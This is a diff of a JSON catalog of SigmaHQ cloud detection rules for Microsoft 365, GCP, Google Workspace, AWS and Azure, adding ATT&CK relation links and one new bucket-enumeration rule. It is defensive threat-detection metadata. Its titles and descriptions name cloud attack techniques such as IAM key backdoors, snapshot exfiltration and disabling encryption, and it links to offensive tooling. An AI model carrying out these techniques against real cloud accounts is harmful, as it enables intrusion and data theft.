"https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://www.sygnia.co/golden-saml-advisory", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" ], "tags": [ @@ -54086,6 +69965,15 @@ "attack.t1136.003" ] }, + "related": [ + { + "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", "value": "New Federated Domain Added" }, @@ -54102,8 +69990,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" ], "tags": [ @@ -54135,6 +70023,15 @@ "attack.t1114" ] }, + "related": [ + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6897cd82-6664-11ed-9022-0242ac120002", "value": "PST Export Alert Using New-ComplianceSearchAction" }, @@ -54151,8 +70048,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" ], "tags": [ @@ -54160,6 +70057,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", "value": "Microsoft 365 - Unusual Volume of File Deletion" }, @@ -54176,8 +70082,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" ], "tags": [ @@ -54185,6 +70091,15 @@ "attack.t1199" ] }, + "related": [ + { + "dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", "value": "Microsoft 365 - User Restricted from Sending Email" }, @@ -54201,8 +70116,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" ], "tags": [ @@ -54225,8 +70140,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" ], "tags": [ @@ -54250,8 +70165,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" ], "tags": [ @@ -54259,6 +70174,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", "value": "Microsoft 365 - Potential Ransomware Activity" }, @@ -54283,6 +70207,15 @@ "attack.t1114" ] }, + "related": [ + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", "value": "PST Export Alert Using eDiscovery Alert" }, @@ -54299,8 +70232,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" ], "tags": [ @@ -54308,6 +70241,15 @@ "attack.t1573" ] }, + "related": [ + { + "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f2468a2-5055-4212-a368-7321198ee706", "value": "Activity from Infrequent Country" }, @@ -54421,11 +70363,11 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", + "https://github.com/elastic/detection-rules/pull/1267", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", - "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", - "https://github.com/elastic/detection-rules/pull/1267", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" ], "tags": [ @@ -54473,8 +70415,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://cloud.google.com/kubernetes-engine/docs", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" ], @@ -54526,8 +70468,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" ], "tags": [ @@ -54535,6 +70477,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", "value": "Google Cloud Firewall Modified or Deleted" }, @@ -54559,6 +70510,15 @@ "attack.t1565" ] }, + "related": [ + { + "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", "value": "Google Cloud Re-identifies Sensitive Information" }, @@ -54587,6 +70547,22 @@ "attack.t1552.007" ] }, + "related": [ + { + "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", "value": "Google Cloud Kubernetes Admission Controller" }, @@ -54612,6 +70588,15 @@ "attack.t1531" ] }, + "related": [ + { + "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", "value": "Google Cloud Service Account Disabled or Deleted" }, @@ -54653,8 +70638,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" ], "tags": [ @@ -54662,6 +70647,15 @@ "attack.t1074" ] }, + "related": [ + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", "value": "Google Full Network Traffic Packet Capture" }, @@ -54679,8 +70673,8 @@ "logsource.product": "google_workspace", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" ], "tags": [ @@ -54712,6 +70706,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", "value": "Google Workspace User Granted Admin Privileges" }, @@ -54776,8 +70779,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" ], @@ -54801,8 +70804,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" ], "tags": [ @@ -54810,6 +70813,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", "value": "Google Workspace Granted Domain API Access" }, @@ -54872,13 +70884,13 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", "https://github.com/elastic/detection-rules/pull/1145/files", "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" ], "tags": [ @@ -54886,6 +70898,15 @@ "attack.t1537" ] }, + "related": [ + { + "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", "value": "AWS S3 Data Management Tampering" }, @@ -54912,6 +70933,22 @@ "attack.t1565" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", "value": "AWS EC2 Disable EBS Encryption" }, @@ -54937,6 +70974,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", "value": "AWS IAM Backdoor Users Keys" }, @@ -54962,6 +71008,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", "value": "AWS SecurityHub Findings Evasion" }, @@ -54978,7 +71033,6 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://attack.mitre.org/techniques/T1525", "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" @@ -54988,6 +71042,15 @@ "attack.t1525" ] }, + "related": [ + { + "dest-uuid": "4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", "value": "AWS ECS Backdoor Task Definition" }, @@ -55036,6 +71099,15 @@ "attack.t1619" ] }, + "related": [ + { + "dest-uuid": "8565825b-21c8-4518-b75e-cbc4c717a156", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4723218f-2048-41f6-bcb0-417f2d784f61", "value": "Potential Storage Enumeration on AWS" }, @@ -55053,7 +71125,6 @@ "logsource.product": "aws", "refs": [ "https://www.justice.gov/file/1080281/download", - "https://attack.mitre.org/techniques/T1537/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml" ], "tags": [ @@ -55061,6 +71132,15 @@ "attack.t1537" ] }, + "related": [ + { + "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", "value": "AWS Snapshot Backup Exfiltration" }, @@ -55085,6 +71165,15 @@ "attack.t1580" ] }, + "related": [ + { + "dest-uuid": "57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "76255e09-755e-4675-8b6b-dbce9842cd2a", "value": "Potential Backup Enumeration on AWS" }, @@ -55109,6 +71198,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", "value": "AWS EFS Fileshare Mount Modified or Deleted" }, @@ -55134,6 +71232,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", "value": "AWS Route 53 Domain Transferred to Another Account" }, @@ -55158,6 +71265,15 @@ "attack.resource_development" ] }, + "related": [ + { + "dest-uuid": "88d31120-5bc7-4ce3-a9c0-7cf147be8e54", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60b84424-a724-4502-bd0d-cc676e1bc90e", "value": "Potential AWS Cloud Email Service Abuse" }, @@ -55213,6 +71329,22 @@ "attack.t1550.001" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", "value": "AWS STS AssumeRole Misuse" }, @@ -55237,6 +71369,15 @@ "attack.t1020" ] }, + "related": [ + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", "value": "AWS RDS Master Password Change" }, @@ -55261,6 +71402,15 @@ "attack.t1531" ] }, + "related": [ + { + "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", "value": "AWS ElastiCache Security Group Modified or Deleted" }, @@ -55279,8 +71429,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" ], "tags": [ @@ -55293,6 +71443,22 @@ "attack.t1550.001" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", "value": "AWS Suspicious SAML Activity" }, @@ -55319,6 +71485,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", "value": "AWS EKS Cluster Created or Deleted" }, @@ -55343,6 +71518,15 @@ "attack.t1020" ] }, + "related": [ + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", "value": "Restore Public AWS RDS Instance" }, @@ -55393,9 +71577,67 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", "value": "AWS EC2 Startup Shell Script Change" }, + { + "description": "Looks for potential enumeration of AWS buckets via ListBuckets.", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2023/01/06", + "falsepositive": [ + "Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity." + ], + "filename": "aws_enum_buckets.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", + "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", + "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1580" + ] + }, + "related": [ + { + "dest-uuid": "57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "f305fd62-beca-47da-ad95-7690a0620084", + "value": "Potential Bucket Enumeration on AWS" + }, { "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n", "meta": { @@ -55417,6 +71659,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", "value": "AWS User Login Profile Was Modified" }, @@ -55441,6 +71692,22 @@ "attack.t1537" ] }, + "related": [ + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", "value": "AWS EC2 VM Export Failure" }, @@ -55465,6 +71732,15 @@ "attack.t1020" ] }, + "related": [ + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c", "value": "AWS EC2 Download Userdata" }, @@ -55481,8 +71757,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://github.com/elastic/detection-rules/pull/1213", "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", + "https://github.com/elastic/detection-rules/pull/1213", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" ], "tags": [ @@ -55493,6 +71769,22 @@ "attack.t1550.001" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", "value": "AWS STS GetSessionToken Misuse" }, @@ -55557,9 +71849,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" ], "tags": [ @@ -55568,6 +71860,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", "value": "AWS Route 53 Domain Transfer Lock Disabled" }, @@ -55638,6 +71939,15 @@ "attack.t1592" ] }, + "related": [ + { + "dest-uuid": "09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70", "value": "Account Enumeration on AWS" }, @@ -55679,8 +71989,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" ], "tags": [ @@ -55711,6 +72021,15 @@ "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", "value": "AWS Root Credentials" }, @@ -55759,6 +72078,22 @@ "attack.t1136.003" ] }, + "related": [ + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", "value": "AWS ElastiCache Security Group Created" }, @@ -55783,6 +72118,15 @@ "attack.t1212" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", "value": "Use of Legacy Authentication Protocols" }, @@ -55886,7 +72230,7 @@ "value": "Applications That Are Using ROPC Authentication Flow" }, { - "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", + "description": "Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.", "meta": { "author": "AlertIQ", "creation_date": "2021/10/10", @@ -55902,9 +72246,21 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" ], "tags": [ - "attack.credential_access" + "attack.credential_access", + "attack.t1556", + "attack.persistence", + "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", "value": "Change to Authentication Method" }, @@ -55927,9 +72283,18 @@ "tags": [ "attack.persistence", "attack.defense_evasion", - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + 